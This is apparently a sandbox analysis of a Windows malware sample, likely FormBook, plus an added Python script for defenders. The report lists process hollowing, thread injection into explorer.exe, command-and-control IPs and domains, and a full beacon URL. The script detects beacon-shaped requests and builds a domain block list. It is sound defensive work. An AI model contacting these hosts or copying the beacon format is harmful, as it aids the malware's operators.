  • PT300975-inv.exe (started): drops C:\Users\user\...\PT300975-inv.exe.log (ASCII); hides that the sample has been downloaded from the Internet (zone.identifier)
    • mscorsvw.exe (started by PT300975-inv.exe): modifies the context of a thread in another process (thread injection); maps a DLL or memory area into another process; sample uses process hollowing technique; 2 other signatures
      • explorer.exe (injected by mscorsvw.exe): system process connects to network (likely due to code injection or exploit)
        • www.asacal.com 156.241.53.196, ports 49755, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles
        • www.solidconstruct.site 198.54.117.244, ports 49750, 80, NAMECHEAP-NETUS, United States
        • 3 other IPs or domains
        • ipconfig.exe (started by explorer.exe): modifies the context of a thread in another process (thread injection); maps a DLL or memory area into another process; tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started by ipconfig.exe)
            • conhost.exe (started by cmd.exe)

Contacted Public IPs

IP              Domain   Country        ASN     ASN Name                         Malicious
156.241.53.196  unknown  Seychelles     136800  XIAOZHIYUN1-AS-APICIDCNETWORKUS  true
198.54.117.244  unknown  United States  22612   NAMECHEAP-NETUS                  true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.solidconstruct.site 198.54.117.244 true
www.asacal.com 156.241.53.196 true
www.hongreng.xyz unknown unknown
g.msn.com unknown unknown
www.kornteengoods.com unknown unknown

Contacted URLs

Name: http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD
Malicious: true
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
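Two of the signatures in this report, "System process connects to network (likely due to code injection or exploit)" and "HTTP GET or POST without a user agent", together with the single URL in the table above, are what a responder turns into a hunt. The Python below is an added example, not part of the sandbox report; it triages constructed proxy-style request records (the first URL is the one listed in this report, the other two are made up) and derives a block list from the report's "Contacted Domains" table. The beacon-shape regexes are a heuristic written from the one URL observed here (short directory, one parameter carrying a long base64-looking value, one short trailing parameter), the list of system processes, and the decision to treat g.msn.com as ordinary Windows traffic rather than C2 are the author's assumptions, not findings of the sandbox.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from this report's "Contacted Domains" table (None = did not resolve).
CONTACTED_DOMAINS = {
    "www.solidconstruct.site": "198.54.117.244",
    "www.asacal.com": "156.241.53.196",
    "www.hongreng.xyz": None,
    "g.msn.com": None,
    "www.kornteengoods.com": None,
}

# Assumption: g.msn.com is ordinary Microsoft traffic from Explorer itself, so it is
# kept off the block list even though the injected explorer.exe also resolved it.
EXPECTED_WINDOWS_HOSTS = {"g.msn.com"}

# Windows binaries that have no business speaking HTTP to arbitrary hosts (assumption).
SYSTEM_PROCESSES = {"explorer.exe", "ipconfig.exe"}

# Heuristic beacon shape taken from the one URL in this report.
BEACON_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,6}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")


def looks_like_beacon(url):
    """True when the URI has a short directory and exactly two query parameters,
    the first a long base64-looking blob and the second a short token."""
    parts = urlsplit(url)
    if not BEACON_PATH_RE.match(parts.path):
        return False
    # Split by hand so '+' inside base64 is not decoded to a space.
    params = [p.partition("=") for p in parts.query.split("&") if p]
    if len(params) != 2:
        return False
    (_, _, v1), (k2, _, v2) = params
    return bool(B64_RE.match(v1)) and 0 < len(k2) <= 12 and 0 < len(v2) <= 12


def triage_request(req):
    """Return (verdict, reasons) for one request record."""
    host = (urlsplit(req["url"]).hostname or "").lower()
    reasons = []
    if req["process"].lower() in SYSTEM_PROCESSES:
        reasons.append("http from system process " + req["process"].lower())
    if not req.get("user_agent"):
        reasons.append("no user agent")
    if host in CONTACTED_DOMAINS:
        reasons.append("host in report IOC list")
    if looks_like_beacon(req["url"]):
        reasons.append("uri matches beacon shape")
    if "uri matches beacon shape" in reasons or len(reasons) >= 3:
        return "malicious", reasons
    return ("review" if reasons else "benign"), reasons


def block_list():
    """Every host the sample contacted, minus expected Windows infrastructure."""
    return sorted(h for h in CONTACTED_DOMAINS if h not in EXPECTED_WINDOWS_HOSTS)


# Constructed request records in the shape a proxy or EDR log would give.
SAMPLE_REQUESTS = [
    {"process": "explorer.exe", "method": "GET",
     "url": "http://www.asacal.com/jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD",
     "user_agent": ""},
    {"process": "explorer.exe", "method": "GET", "url": "http://g.msn.com/",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
    {"process": "chrome.exe", "method": "GET", "url": "https://example.com/abc/?q=hello&page=2",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
]

if __name__ == "__main__":
    for r in SAMPLE_REQUESTS:
        print(triage_request(r), r["url"])
    print(block_list())
```

The g.msn.com request lands on "review" rather than "malicious": it comes from explorer.exe and the host is in the report's contact list, but that is exactly the traffic Explorer generates on its own, which is why a domain list lifted straight from a sandbox run should be pruned before it becomes a block rule, while the URI shape plus the missing User-Agent is what separates the FormBook beacon from the noise.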